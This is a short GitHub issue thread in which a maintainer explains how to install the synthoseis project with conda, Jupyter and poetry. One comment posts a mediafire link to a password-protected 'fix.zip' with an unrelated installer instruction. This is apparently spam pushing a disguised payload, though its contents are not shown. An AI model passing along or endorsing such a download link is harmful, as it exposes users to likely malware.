### ISSUE TITLE
How to install a synthoseis environment

### ISSUE THREAD

**Issue by gavargas22** [sede-open/synthoseis#23]
This is regarding your question @geokefe:

Essentially you need to create a new python environment:

`conda create -n synthoseis python=3.11 -y `

Install Jupyter notebook(lab)

`conda install jupyter lab`

Then install a package manager called **poetry**

`pip install poetry`

Install dependencies:

`poetry install`

Now if you run `jupyter lab` you should be able to run the notebook

Let me know how it goes

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by geokefe** [comment]
Thank you so much @gavargas22. The installation works fine. I appreciate your efforts.
